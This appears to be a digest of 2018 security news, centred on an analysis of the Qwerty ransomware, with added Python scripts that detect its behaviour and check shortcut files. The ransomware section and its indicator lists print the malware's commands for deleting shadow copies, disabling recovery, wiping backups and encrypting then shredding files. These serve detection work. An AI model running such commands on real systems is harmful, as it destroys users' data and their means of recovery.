    ownertrust.txt: d06ffa2b486cd0601409db821d38334d0958bf8978f677330908a4c3c87a2b48
    qwerty-pub.key: dc1f6d197904a59894a9b9e66f0f6674766c49151a8ced2344dfaadaf54330b8
    run.js: 6a6722b3b177426ec9ebb27898ef2340208c5644eb56eb5b064f2b2e34bf20bf
    shred.exe: 7eae0a885c7ef8a019b80d55a00e82af2e9a9465b052156490ff822ac68bc23a

Associated Files:

    README_DECRYPT.txt

Ransom Note Text:

    Your computer is encrypted . Mail cryz1@protonmail.com . Send your ID 5612.
    Note! You have only 72 hours for write on e-mail (see below) or all your files will be lost!

Associated Emails:

    cryz1@protonmail.com

Executed Commands:

    taskkill /F /IM sql /T
    taskkill /F /IM chrome.exe /T
    taskkill /F /IM ie.exe /T
    taskkill /F /IM firefox.exe /T
    taskkill /F /IM opera.exe /T
    taskkill /F /IM safari.exe /T
    taskkill /F /IM taskmgr.exe /T
    taskkill /F /IM 1c /T
    vssadmin.exe delete shadows /all /quiet
    wmic shadowcopy delete
    bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
    bcdedit.exe bcdedit /set {default} recoveryenabled no
    wbadmin.exe wbadmin delete catalog -quiet
    del /Q /F /S %s$recycle.bin
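The command sequence and the gpg/shred pattern in the post above are exactly what endpoint telemetry can be watched for. The Python script below is an added example, not part of the original post and not a vendor product: it scans JSON-per-line process-creation events for the recovery-destroying commands (vssadmin, wmic, bcdedit, wbadmin) and for the Qwerty gpg/shred invocation pattern, then rolls the hits up per host so that a machine showing both backup destruction and encrypt-and-wipe activity is called out as a likely ransomware infection rather than as an admin deleting shadow copies. The log lines, hostnames, user names and file paths inside it are constructed for the demonstration, and the field names (UtcTime, Computer, Image, CommandLine) are an assumed Sysmon-style export, not any specific vendor's schema.

```python
import json
import re
from collections import defaultdict

# Indicators distilled from the command list in the post. Each entry is
# (compiled regex, indicator class, analyst-facing reason). The two classes
# let the per-host summary distinguish "backups/recovery being destroyed"
# from "files being encrypted and the originals wiped".
INDICATORS = [
    (re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
     "recovery-tamper", "shadow copies deleted (vssadmin)"),
    (re.compile(r"wmic\s+shadowcopy\s+delete", re.I),
     "recovery-tamper", "shadow copies deleted (wmic)"),
    (re.compile(r"bcdedit.*\brecoveryenabled\s+no\b", re.I),
     "recovery-tamper", "Windows recovery disabled (bcdedit)"),
    (re.compile(r"bcdedit.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I),
     "recovery-tamper", "boot failure prompts suppressed (bcdedit)"),
    (re.compile(r"wbadmin.*\bdelete\s+catalog\b", re.I),
     "recovery-tamper", "backup catalog deleted (wbadmin)"),
    # Qwerty-specific: gpg encrypting to recipient 'qwerty' with a .qwerty output.
    (re.compile(r"gpg(\.exe)?\s.*--recipient\s+qwerty\b.*\.qwerty\b", re.I),
     "encrypt-wipe", "gpg encrypting to recipient 'qwerty' with .qwerty output"),
    # shred -u unlinks the file after overwriting it (the post's one-pass wipe).
    (re.compile(r"shred(\.exe)?\s.*\s-u\b", re.I),
     "encrypt-wipe", "shred overwriting and unlinking a file"),
]


def scan_event(event):
    """Return [(class, reason), ...] for one process-creation event."""
    cmdline = event.get("CommandLine", "")
    return [(cls, reason) for pat, cls, reason in INDICATORS if pat.search(cmdline)]


def scan_log(lines):
    """Parse JSON-per-line events and return one alert per matching event."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # malformed telemetry line: skip it rather than crash
        hits = scan_event(event)
        if hits:
            alerts.append({
                "time": event.get("UtcTime"),
                "host": event.get("Computer"),
                "image": event.get("Image"),
                "classes": sorted({cls for cls, _ in hits}),
                "reasons": [reason for _, reason in hits],
            })
    return alerts


def summarize_by_host(alerts):
    """Roll alerts up per host. A host showing BOTH recovery tampering and
    encrypt/wipe activity gets the 'ransomware-likely' verdict; a host with
    only one class is 'suspicious' (an admin may legitimately delete shadow
    copies, and gpg alone is normal on a developer workstation)."""
    per_host = defaultdict(lambda: {"classes": set(), "reasons": []})
    for alert in alerts:
        per_host[alert["host"]]["classes"].update(alert["classes"])
        per_host[alert["host"]]["reasons"].extend(alert["reasons"])
    summary = {}
    for host, info in per_host.items():
        both = {"recovery-tamper", "encrypt-wipe"} <= info["classes"]
        summary[host] = {
            "verdict": "ransomware-likely" if both else "suspicious",
            "classes": sorted(info["classes"]),
            "reasons": info["reasons"],
        }
    return summary


# Constructed sample telemetry (hostnames, users and paths are made up).
SAMPLE_LOG = r"""
{"UtcTime": "2018-03-10 02:14:05", "Computer": "WS-FINANCE-07", "Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin.exe delete shadows /all /quiet"}
{"UtcTime": "2018-03-10 02:14:06", "Computer": "WS-FINANCE-07", "Image": "C:\\Windows\\System32\\bcdedit.exe", "CommandLine": "bcdedit /set {default} recoveryenabled no"}
{"UtcTime": "2018-03-10 02:14:09", "Computer": "WS-FINANCE-07", "Image": "C:\\Users\\Public\\gpg.exe", "CommandLine": "gpg.exe --recipient qwerty -o \"C:\\Users\\bob\\Documents\\budget.xlsx.1.qwerty\" --encrypt \"C:\\Users\\bob\\Documents\\budget.xlsx\""}
{"UtcTime": "2018-03-10 02:14:10", "Computer": "WS-FINANCE-07", "Image": "C:\\Users\\Public\\shred.exe", "CommandLine": "shred -f -u -n 1 \"C:\\Users\\bob\\Documents\\budget.xlsx\""}
{"UtcTime": "2018-03-10 02:20:00", "Computer": "WS-DEV-02", "Image": "C:\\Program Files\\GnuPG\\bin\\gpg.exe", "CommandLine": "gpg --recipient alice@example.com --encrypt report.pdf"}
{"UtcTime": "2018-03-10 02:21:30", "Computer": "WS-DEV-02", "Image": "C:\\Windows\\System32\\vssadmin.exe", "CommandLine": "vssadmin list shadows"}
"""

if __name__ == "__main__":
    for host, info in summarize_by_host(scan_log(SAMPLE_LOG.splitlines())).items():
        print(f"{host}: {info['verdict']}")
        for reason in info["reasons"]:
            print(f"  - {reason}")
```

On the constructed sample, WS-FINANCE-07 produces four alerts and the "ransomware-likely" verdict, while the developer workstation's ordinary gpg use and "vssadmin list shadows" produce nothing. The gpg rule is deliberately tied to the recipient name and extension reported in the post; a production rule would widen it to any gpg --encrypt whose output lands outside the user's normal document workflow, at the cost of more triage.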
  13. Chinese intelligence agencies are doctoring the Chinese National Vulnerabilities Database (CNNVD) to hide security flaws that government hackers might have an interest in, according to a report released on Friday by US threat intelligence firm Recorded Future. The US company says it noticed in recent months mass edits to the CNNVD website. Recorded Future says CNNVD operators have been backdating the publication dates for hundreds of vulnerabilities.

Backdating started after a previous Recorded Future report

The backdating operations started after the publication of a Recorded Future report in November last year, in which Recorded Future described how CNNVD delays the disclosure of critical bugs to give Chinese cyber intelligence agencies the time to evaluate the operational utility of said vulnerabilities. Recorded Future has been taking snapshots of the CNNVD website in the past year and has detected backdating edits to at least 267 critical vulnerabilities. For example, the publication date of CVE-2016-10136, a vulnerability in the Adups firmware included with many smartphones, has been backdated 235 days, while the Office CVE-2017-0199 vulnerability has been backdated 57 days.

Backdating done to hide "vulnerability evaluation" program

"CNNVD's manipulation of its vulnerability publication data ultimately reveals more than it conceals," the Recorded Future team says. "First, the selective backdating of vulnerability publication for the outliers is essentially a tacit confirmation from CNNVD of their vulnerability evaluation program and the operational use of some delayed vulnerabilities.

"Second, while many think of the MSS (Ministry of State Security) as primarily a foreign intelligence service, it also has a large, and arguably more important, domestic intelligence mandate."

Recorded Future analysts argue that the delay in disclosure and backdating of critical flaws were most likely carried out to hide security flaws from local companies, those expected to rely on the database for daily patching operations. This was done to aid surveillance of Chinese internal entities. Nonetheless, experts now believe that because of the new backdating practice, foreign cyber intelligence agencies will have a harder time spotting the critical flaws that MSS and its hackers are evaluating and pondering for their cyber arsenal. This will make preparing countermeasures much harder for foreign states.

In its November report, Recorded Future also revealed that CNNVD was housed in the same building as China's Ministry of State Security (MSS), and was most likely under its firm control. The US cyber intelligence firm had previously revealed that MSS was in charge of China's international hacking efforts, and was commanding Chinese-linked APT groups, such as APT3, through government contractors. Chinese officials have also recently banned Chinese security researchers from attending a foreign security conference, hoping to keep them from disclosing security flaws to western firms.
  14. Windows Server, Apache Solr, and Redis servers have been targeted this week by cyber-criminals looking to take over unpatched machines and install malware that mines cryptocurrency (known as a coinminer). Two separate campaigns have been spotted, both very active this week: one spotted by the Imperva crew, targeting Redis and Windows Servers, and another by the ISC SANS team, targeting Apache Solr installations.

Campaign targeting Redis and Windows Server

The more active of the two was a campaign that Imperva nicknamed RedisWannaMine. This campaign is ongoing, and according to Imperva, cyber-criminals have been compromising servers by mass-scanning the Internet for systems running outdated Redis versions that are vulnerable to the CVE-2017-9805 exploit. Once criminals gain access to a host, their typical infection chain is to drop the RedisWannaMine malware that later installs a second-stage cryptocurrency miner.

But the RedisWannaMine campaign also displays the classic behavioral pattern of a self-propagating worm. This is because attackers also use the same infected servers to mass-scan and later exploit other targets. However, the RedisWannaMine attackers aren't only targeting other Redis servers, but are also looking for Windows Servers with exposed SMB ports. For these latter Windows Server instances, attackers deploy the now classic leaked NSA exploit EternalBlue. In these infections, too, they also drop a coinminer on the Windows Server machines they compromise, showing that cryptocurrency is the primary objective of these attacks.

This isn't the first time that a coinminer campaign has targeted Redis servers. Earlier in February, attackers made almost $1 million by infecting Redis and OrientDB servers with similar coinminer malware.

Campaign targeting Apache Solr

But besides the RedisWannaMine crew, there was another very active cyber-criminal group this week. This second one targeted Apache Solr servers that hadn't received patches for the CVE-2017-12629 vulnerability. Just like in the RedisWannaMine incidents, attackers focused on infecting victims with a cryptocurrency miner. ISC SANS researchers didn't notice any self-propagation mechanism, meaning scans and infections were taking place from a central location, but they did manage to determine an approximate number of affected servers: 1,777 infections that appear to have taken place between February 28 and March 8.

But while Redis and Windows Servers are standalone systems that are easier to patch, Apache Solr (search servers) are in many cases embedded in other, more complex software, and patching isn't as easy as it sounds because updating Solr might sometimes break internal systems that depend on it.
  15. A massive survey of nearly 1,200 IT security practitioners and decision makers across 17 countries reveals that half the people who fell victim to ransomware infections last year were able to recover their files after paying the ransom demand. The survey, carried out by research and marketing firm CyberEdge Group, reveals that paying the ransom demand, even if for desperate reasons, does not guarantee that victims will regain access to their files. Timely backups are still the most efficient defense against possible ransomware infections, as they allow easy recovery.

Over a quarter of all victims lost their data for good

The survey reveals that 55% of all respondents suffered a ransomware infection in 2017, compared to the previous year's study, when 61% experienced similar incidents. Of all the victims who suffered ransomware infections, CyberEdge discovered that 61.3% opted not to pay the ransom at all. Some lost files for good (8%), while the rest (53.3%) managed to recover files, either from backups or by using ransomware decrypter applications.

Of the 38.7% who opted to pay the ransom, a little less than half (19.1%) recovered their files using the tools provided by the ransomware authors. The rest (19.6%) lost their data. Ransomware authors either didn't provide ransomware decryption instructions or apps, or these tools did not yield the expected results. Overall, the study found that over a quarter of ransomware victims (27.6%) lost their data for good, whether by paying or not paying the ransom demand.

Other findings of the CyberEdge survey are below:

- 77% of all organizations suffered a form of cyber-attack in 2017 (down from 79% in 2016).
- Security-related budgets are prognosticated to rise in 2018 by 4.7% compared to last year.
- Security-related budgets are expected to account for 12% of the overall IT budget for companies in 2018.
- Four in five organizations said they are experiencing a shortage of personnel with IT security skills.
- Nine in ten companies are experiencing cloud-related security and privacy problems.
- Survey respondents said they perceive mobile devices and app containers (Docker, Kubernetes, Cloud Foundry) as their organization's weakest link in terms of security.
- Respondents said they plan to invest money in 2018 in advanced malware analysis/sandboxing (network security), containerization/micro-virtualization (endpoint and mobile security), and API gateways (application and data-centric security).
  16. According to sleuthing Windows Insiders, the next Windows feature update appears to be named "Spring Creators Update". This is based on the output of a command entered in the latest Insider Preview build from the skip ahead ring. Yesterday, a Twitter user who goes by the name WalkingCat asked his followers to run the PowerShell command "Get-VMHostSupportedVersion" on build 17618, which is the latest skip ahead version available to Insiders. Someone responded with a picture that clearly shows the next update is being named Spring Creators Update with a build number of 1803 and a version number of 8.3.

(Tweet by Pennybridge1969 (@warnelidl), March 8, 2018: pic.twitter.com/5bMdXY6QeM)

To explain how this works, it is important to understand the various builds that are available to Insiders. The next version of Windows 10 is codenamed RS4, or Redstone 4, and the version after that is RS5, or Redstone 5. Most insiders are previewing the builds associated with RS4, which is the next update to be released this spring and what this article is about. There are some insiders, though, who are in the skip ahead ring. This means they are given builds for the RS5 build that will probably be released sometime during the summer of 2018.

Now, the PowerShell command Get-VMHostSupportedVersion lists all the Hyper-V virtual machine configuration versions that are supported on a particular host. This list will contain the name of the previous Windows 10 version. Since the RS5 build 17618 comes out after the RS4 build, when you run this command on it, it will display the names of the previous Windows 10 versions. This includes the RS4 build that will be released before it. This is why the output of this command on an RS5 build pretty much confirms that the next update will be called Spring Creators Update.

The Spring Creators Update includes some new features such as Timeline & Sets (File Explorer with Tabs!), Edge and Cortana improvements, new privacy setting layouts, and People.
  17. A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program*to encrypt a victim's files.* Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victims files, overwrite the originals, and the append the .qwerty extension to an encrypted file's name. It goes without saying, that GnuPG is a legitimate programs being illegally used by the Qwerty Ransomware developers. While a ransomware*using GnuPG to encrypt files is not unique as it has been done in the past with VaultCrypt and KeyBTC, it is not something that is commonly seen. While it is not known for sure how this ransomware is being distributed, it appears likely that it is manually installed by the attacker when they hack into computer running Remote Desktop Services.* First discovered by MalwareHunterTeam, we did not have the full package in order to fully analyze it. This week MalwareHunterTeam was able to find the complete package hosted on a site so that we could analyze it further. How the Qwerty Ransomware encrypts a computer The Qwerty Ransomware consists of a package of individual files that are run together to encrypt a computer. This package consists of the GnuPG*gpg.exe*executable, the*gnuwin32*shred.exe file, a batch file that loads the keys and launches a JS file, and a JS file that is used to launch the find.exe program. Qwerty Ransomware Package The first file to be launched is the key.bat file. This file acts as the main launcher for the ransomware by executing various commands sequentially. Batch File When the batch file is executed, the keys will be imported as shown below. Importing Keys After the keys are imported, the batch file will launch run.js. This file will execute the find.exe program, which is the main ransomware component. When executing find.exe, it will specify a particular drive letter that it tries to encrypt. 
JavaScript File When find.exe is executed it will launch the following commands on the victim's computer. taskkill /F /IM sql /T taskkill /F /IM chrome.exe /T taskkill /F /IM ie.exe /T taskkill /F /IM firefox.exe /T taskkill /F /IM opera.exe /T taskkill /F /IM safari.exe /T taskkill /F /IM taskmgr.exe /T taskkill /F /IM 1c /T vssadmin.exe delete shadows /all /quiet wmic shadowcopy delete bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures bcdedit.exe bcdedit /set {default} recoveryenabled no wbadmin.exe wbadmin delete catalog -quiet del /Q /F /S %s$recycle.bin It will then begin to encrypt each drive on the computer by executing the following command when it encrypts a file: gpg.exe --recipient qwerty -o "%s%s.%d.qwerty" --encrypt "%s%s" This command will encrypt the file using the imported public key and then save it as a new file under the same name, but now with the*.qwerty extension appended to it. For example, test.jpg would be encrypted and saved as test.jpg.qwerty. Encrypted Qwerty Files When encrypting files, it will encrypt any file that does not contain the following strings: Recycle temp Temp TEMP windows Windows WINDOWS Program Files PROGRAM FILES ProgramData gnupg .qwerty README_DECRYPT.txt .exe .dll After it encrypts a file it will run the shred.exe file on the original file in order to overwrite it. shred -f -u -n 1 "%s%s" It should be noted that it only overwrites files once, so they may be recoverable with file recovery software. The use of only one wipe is a tradeoff between speed and securely deleting the file. In each folder that a file is encrypted, it will create a ransom note named README_DECRYPT.txt*which contains instructions to contact cryz1@protonmail.com to receive payment instructions. Qwerty Ransom Note Unfortunately, this ransomware is secure and there is no way to decrypt files for free as only the attacker has possession of the private decryption key. 
Due to the components used to encrypt the computer, the process is very slow, so it may be possible to spot the ransomware in action and shutdown the computer before it encrypts too many files. How to protect yourself from the Qwerty Ransomware In order to protect yourself from ransomware*in general, it is important that you use good computing habits and security software. First and foremost, you should always have a reliable and tested backup of your data that can be restored in the case of an emergency, such as a ransomware attack. As Qwerty appears to be installed via hacked Remote Desktop services, it is very important to make sure its locked down correctly. This includes making sure that no computers running remote desktop services are connected directly to the Internet. Instead place computers running remote desktop behind VPNs so that they are only accessible to those who have VPN accounts on your network. It is also important to setup proper account lockout policies so that it makes it difficult for accounts to be brute forced over Remote Desktop Services. You should also have security software that incorporates behavioral detections to combat ransomware and not just signature detections*or heuristics.* For example,*Emsisoft Anti-Malware*and*Malwarebytes Anti-Malware*both contain behavioral detection that can prevent many, if not most, ransomware infections from encrypting a computer. Last, but not least, make sure you practice the following security habits, which in many cases are the most important steps of all: Backup, Backup, Backup! Do not open attachments if you do not know who sent them. Do not open attachments until you confirm that the person actually sent you them, Scan attachments with tools like*VirusTotal. Make sure all Windows updates are installed as soon as they come out! Also make sure you update all programs, especially Java, Flash, and Adobe Reader. 
Older programs contain security vulnerabilities that are commonly exploited by malware distributors, so it is important to keep them updated.
Make sure you have some sort of security software installed that uses behavioral detections or whitelisting technology. Whitelisting can be a pain to train, but if you're willing to stick with it, it can have the biggest payoff.
Use strong passwords and never reuse the same password at multiple sites.

For a complete guide on ransomware protection, you can visit our How to Protect and Harden a Computer against Ransomware article.

IOCs

Associated Files:

    README_DECRYPT.txt

Ransom Note Text:

    Your computer is encrypted . Mail cryz1@protonmail.com . Send your ID 5612. Note! You have only 72 hours for write on e-mail (see below) or all your files will be lost!
Associated Emails:

    cryz1@protonmail.com

Executed Commands:

    taskkill /F /IM sql /T
    taskkill /F /IM chrome.exe /T
    taskkill /F /IM ie.exe /T
    taskkill /F /IM firefox.exe /T
    taskkill /F /IM opera.exe /T
    taskkill /F /IM safari.exe /T
    taskkill /F /IM taskmgr.exe /T
    taskkill /F /IM 1c /T
    vssadmin.exe delete shadows /all /quiet
    wmic shadowcopy delete
    bcdedit.exe bcdedit /set {default} bootstatuspolicy ignoreallfailures
    bcdedit.exe bcdedit /set {default} recoveryenabled no
    wbadmin.exe wbadmin delete catalog -quiet
    del /Q /F /S %s$recycle.bin
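The backup-destruction commands listed above are the most reliable place to catch this family before the slow gpg encryption loop gets far. The following Python script is an added example, not code from the article or from the ransomware itself: it scans process-creation log lines (a simplified, assumed timestamp|image|command-line format, with constructed sample entries) for those exact commands and for the gpg invocation with the hard-coded qwerty recipient, then scores each host.

```python
"""
Score process-creation log lines for the Qwerty ransomware command set.
Added example; the log format (timestamp|image|cmdline) and the sample
lines below are constructed, not taken from any product or real host.
"""
import re

# Recovery-tampering commands, drawn from the article's command list.
RECOVERY_TAMPERING = {
    "shadow-copy-delete-vssadmin": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "shadow-copy-delete-wmic": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "bootstatuspolicy-ignore": re.compile(r"bcdedit(?:\.exe)?.*bootstatuspolicy\s+ignoreallfailures", re.I),
    "recovery-disabled": re.compile(r"bcdedit(?:\.exe)?.*recoveryenabled\s+no", re.I),
    "backup-catalog-delete": re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I),
    "recycle-bin-wipe": re.compile(r"del\s+.*\$recycle\.bin", re.I),
}

# Killing browsers or Task Manager is weak evidence on its own; score it low.
TASKKILL = re.compile(r"taskkill\s+/F\s+/IM\s+(\S+)", re.I)
# The encryption step: gpg called with the hard-coded "qwerty" recipient.
GPG_QWERTY = re.compile(r"gpg(?:\.exe)?\s+--recipient\s+qwerty\b", re.I)


def parse_line(line):
    """Split one constructed log line into (timestamp, image, cmdline)."""
    ts, image, cmdline = line.split("|", 2)
    return ts.strip(), image.strip(), cmdline.strip()


def classify(cmdline):
    """Return the list of detection tags that apply to one command line."""
    tags = [name for name, pat in RECOVERY_TAMPERING.items() if pat.search(cmdline)]
    if GPG_QWERTY.search(cmdline):
        tags.append("gpg-qwerty-encrypt")
    m = TASKKILL.search(cmdline)
    if m:
        tags.append("taskkill:" + m.group(1).lower())
    return tags


def score_host(lines):
    """Aggregate evidence for one host: returns (score, sorted tags, alert)."""
    tags = []
    for line in lines:
        _, _, cmd = parse_line(line)
        tags.extend(classify(cmd))
    strong = {t for t in tags if t in RECOVERY_TAMPERING or t == "gpg-qwerty-encrypt"}
    weak = {t for t in tags if t.startswith("taskkill:")}
    score = 3 * len(strong) + len(weak)
    # Two distinct strong indicators (e.g. shadow deletion plus the gpg
    # pattern) are enough to alert; taskkill noise alone never is.
    alert = len(strong) >= 2
    return score, sorted(strong | weak), alert


# Constructed sample: a host running the sequence described in the article.
SAMPLE_LOG = [
    r"2018-03-09T10:00:01|C:\Windows\System32\taskkill.exe|taskkill /F /IM chrome.exe /T",
    r"2018-03-09T10:00:02|C:\Windows\System32\vssadmin.exe|vssadmin.exe delete shadows /all /quiet",
    r"2018-03-09T10:00:03|C:\Windows\System32\bcdedit.exe|bcdedit /set {default} recoveryenabled no",
    r"2018-03-09T10:00:04|C:\Windows\System32\cmd.exe|del /Q /F /S C:\$recycle.bin",
    r'2018-03-09T10:00:05|C:\Users\victim\gpg.exe|gpg.exe --recipient qwerty -o "C:\Users\victim\test.jpg.1.qwerty" --encrypt "C:\Users\victim\test.jpg"',
]

# Constructed sample: ordinary admin activity that must not alert.
BENIGN_LOG = [
    r"2018-03-09T11:00:00|C:\Windows\System32\vssadmin.exe|vssadmin list shadows",
    r"2018-03-09T11:00:01|C:\Windows\System32\taskkill.exe|taskkill /F /IM notepad.exe",
]

if __name__ == "__main__":
    for name, log in (("sample", SAMPLE_LOG), ("benign", BENIGN_LOG)):
        score, tags, alert = score_host(log)
        print(f"{name}: score={score} alert={alert} tags={tags}")
```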
  18. Türk Telekom, a Turkish Internet Service Provider (ISP), has deployed special hardware to intercept and alter Internet traffic, swapping legitimate software downloads with similar applications that are infected with spyware.

A Citizen Lab report claims that Türk Telekom has deployed Sandvine PacketLogic middleboxes in five regions across the country. These devices are powerful traffic interception machines that allow the ISP to spy on unencrypted traffic, and even alter its content by injecting additional code.

Middleboxes used as malware delivery system

According to the report, the devices deployed on the network of this ISP have been used as a malware delivery system. Researchers spotted the middleboxes redirecting users attempting to download software from official websites to pages offering the same software, but injected with the FinFisher spyware. In later cases, researchers say the payload switched from FinFisher to another spyware strain named StrongPity.

Citizen Lab says it identified such redirects when users tried to download Avast Antivirus, CCleaner, VLC, Opera, and 7-Zip from their official websites. Additionally, the ISP also tainted some software downloads hosted on CNET's Download.com platform in a similar manner, offering the spyware-infected version instead of the legitimate app.

These download switcheroos didn't happen for everyone. Citizen Lab says it identified 259 IP addresses for which the middleboxes replaced downloaded software. Some IPs belonged to users located in Syria, where some Türk Telekom subscribers provided Internet access via cross-border directional Wi-Fi links.

Government involvement highly probable

But researchers don't believe this is the work of a rogue employee. This is because the same ISP middleboxes have been used to censor access to various political domains, such as the website of the Kurdistan Workers' Party (PKK), Wikipedia, and the website of the Dutch Broadcast Foundation (NOS).
Furthermore, FinFisher isn't your regular run-of-the-mill malware. This is a very expensive "lawful intercept" product sold only to government agencies by the eponymous FinFisher company, a provider of government-grade surveillance technology.

The censorship of political domains and the deployment of spyware made available only to law enforcement suggest heavy involvement of the Turkish government in the traffic interception scheme. It is unclear if the government was going after dissidents or was cracking down on Syrian Kurdish troops, against which Turkish forces are engaged in military campaigns.

The Citizen Lab report describes two cyber-espionage campaigns that ESET detailed in reports published in September and December 2017. ESET detected the same thing, an ISP tampering with user app downloads, but did not reveal the ISP's or the country's name. The September report claimed an ISP was distributing the FinFisher spyware, while the December report detailed the StrongPity spyware distribution campaign.

Similar middleboxes detected in Egypt as well

Besides the Türk Telekom middleboxes, Citizen Lab researchers found similar devices deployed on the network of Telecom Egypt, an Egyptian ISP. Researchers say these middleboxes blocked access to dozens of human rights, political, and news websites, including Human Rights Watch, Reporters Without Borders, Al Jazeera, Mada Masr, and HuffPost Arabic.

The Egyptian ISP didn't deliver spyware by replacing download attempts, but it did inject ads and in-browser cryptocurrency miners into its subscribers' Internet traffic, most likely as a money-making scheme. A wealth of additional details can be found in Citizen Lab's very detailed report on these two campaigns.
  19. Keeper, an embattled password manager maker currently suing a news reporter for defamation, left a server hosting the company's installer files exposed with full permissions, allowing anyone to access and replace files with malicious content, a security researcher told ZDNet.

Chris Vickery, who found the exposed server, immediately notified ZDNet of the exposure. We reached out to Keeper by phone and email on Friday. Within an hour of disclosure, the server had been secured.

Keeper executive Aaron Gessner denied the claims. "Since we did not receive any report from a security researcher and because it's not a production-facing bucket, we decided to revoke all read and write access while we investigate this report we received from Zack Whittaker at 2pm CST, on March 9," said Gessner. "This bucket was not public writable, despite the report. Also, there were no private keys in this bucket."

ZDNet followed up after Keeper's statement in an email. "We are continuing to investigate your email and will reply when we have completed a thorough investigation," Gessner replied.

The Chicago, Ill.-based company owns an Amazon S3 storage server to host installers for its various supported platforms. But the server wasn't password protected, and it gave anyone accessing the server "full control" over its contents, including reading, replacing, and deleting files. Many of the files included archived copies of the company's Windows, Mac, Android, and iPhone install files.

One file on the server was a private code-signing certificate issued by Apple. The certificate, also known as a key, which can be used to sign the company's iPhone and iPad apps, was issued to Callpod Inc., a company founded by Keeper chief executive Darren Guccione. It's plausible that a skilled attacker could have replaced a legitimate iPhone or iPad installer with a malicious file.
It's not clear if the company's website was directly linking to the files on the exposed server, making it near impossible to determine the risk -- if any -- to customers.

Keeper recently -- and controversially -- sued Ars Technica's security editor, Dan Goodin, over a story he wrote about a vulnerability in Keeper's password manager browser extension. Although the company confirmed the vulnerability, Goodin was later named in a defamation suit for allegedly making "false and misleading statements about the Keeper software application suggesting that it had a 16-month old bug that allowed sites to steal user passwords."

The news sparked anger in the security community, which criticized the company's response. Many high-profile researchers and well-known figures in the community argued that such action will likely have a chilling effect on future security research and vulnerability disclosure. Goodin's lawyers filed a motion to dismiss the case, but Keeper -- still under pressure from the security community -- doubled down on its case this week and filed a motion opposing Goodin's efforts to end the suit.
  20. Hackers are distributing a newly discovered form of trojan malware that offers full access to infected Windows PCs. Dubbed FlawedAmmyy, the malware is built on top of leaked source code for a legitimate app -- Version 3 of Ammyy Admin remote desktop software -- and enables attackers to secretly snoop on those duped into installing it.

The RAT [Remote Access Trojan] is capable of complete remote desktop control, providing hackers with full access to the system and the opportunity to steal files, credentials and more. The malware also has the potential to abuse audio chat.

While those behind FlawedAmmyy attempt to deliver it in bulk using massive phishing campaigns, they're also engaging in narrower campaigns targeting specific sectors, with attacks focused on the automotive industry among others. This campaign to infect PCs with FlawedAmmyy was active just days ago.

A previously undocumented malware, FlawedAmmyy has been uncovered by researchers at Proofpoint, who say the group behind it has been actively deploying the trojan since January 2016. The organisation behind the attacks is thought to be TA505, a prolific hacking group that has been active since 2014 and has previously targeted victims using the Dridex banking trojan, Locky ransomware, Jaff ransomware and more in wide-ranging campaigns.

Attempts at delivering FlawedAmmyy are similar to those schemes, with messages sent out with subjects relating to receipts, bills and invoices, and an email attachment in the form of a .ZIP file purporting to be related to a transaction.

A phishing email used to distribute the malware. Image: Proofpoint

The ZIP file contains .url files, which are designed to serve as links to websites and automatically launch a web browser.
In this case, the files are used to connect to a "file://" instead of an "http://" link, meaning that if the victim opens the attachment, the system downloads and executes JavaScript over the Server Message Block (SMB) protocol instead of through the browser. Researchers say this is the first instance of these two elements being combined to infect systems with malware.

Once the SMB protocol has been called, the JavaScript downloads Quant Loader, which in turn fetches the final payload and installs FlawedAmmyy on the infected PC.

"We have seen FlawedAmmyy in both massive campaigns, potentially creating a large base of compromised computers, as well as targeted campaigns that create opportunities for actors to steal customer data, proprietary information, and more," said researchers at Proofpoint.

The trojan doesn't give victims any major signs that their computer has been infected. In order to avoid infection, users should avoid clicking on unexpected and strange links -- especially from unknown senders.

"As always, users should not open attachments from senders they do not know and should be cognisant of security warnings when opening files. Layered defences at the email gateway, IDS, and endpoint can all provide important protection for threats of this nature," said researchers.

ZDNet has attempted to contact the makers of Ammyy Admin about hackers' use of the leaked code, but no response has been received at the time of writing.
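Because the trick described above comes down to what the shortcut's URL= entry points at, here is an added Python triage routine (not Proofpoint's code or the malware's) that opens an attachment ZIP in memory, parses each .url file's [InternetShortcut] section, and flags file:// or UNC targets, which Windows would fetch over SMB rather than hand to the browser. The ZIP, its file names and the 198.51.100.7 address are constructed for the example.

```python
"""
Triage .url (Internet Shortcut) files inside a mail attachment ZIP.
A .url file is a small INI file whose [InternetShortcut] section carries
a URL= line; an http(s) target is normal, a file:// or \\host\share target
means an SMB fetch. Added example with constructed sample data.
"""
import configparser
import io
import zipfile
from urllib.parse import urlparse

SUSPICIOUS_SCHEMES = {"file"}
SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".wsf", ".hta", ".exe", ".scr")


def parse_url_shortcut(data: bytes):
    """Return the URL= target of a .url file, or None if it is not one."""
    text = data.decode("utf-8", errors="replace")
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:          # no section header, malformed lines
        return None
    if not cp.has_section("InternetShortcut"):
        return None
    return cp.get("InternetShortcut", "URL", fallback=None)


def assess_target(url):
    """Classify one shortcut target. Returns (verdict, reason)."""
    if url is None:
        return ("unknown", "no URL= entry")
    target = url.strip()
    if target.startswith("\\\\"):        # raw UNC path such as \\host\share\x.js
        return ("malicious", "UNC path target: resource fetched over SMB")
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    if scheme in SUSPICIOUS_SCHEMES:
        # file://host/share/x.js with a host is a remote SMB fetch;
        # file:///C:/... only touches the local disk, still worth a look.
        if parsed.netloc:
            return ("malicious", "file:// target (remote SMB share)")
        return ("suspicious", "file:// target (local path)")
    if scheme not in ("http", "https"):
        return ("suspicious", f"unusual scheme {scheme!r}")
    if target.lower().endswith(SCRIPT_EXTENSIONS):
        return ("suspicious", "web URL pointing straight at a script/executable")
    return ("benign", "ordinary web link")


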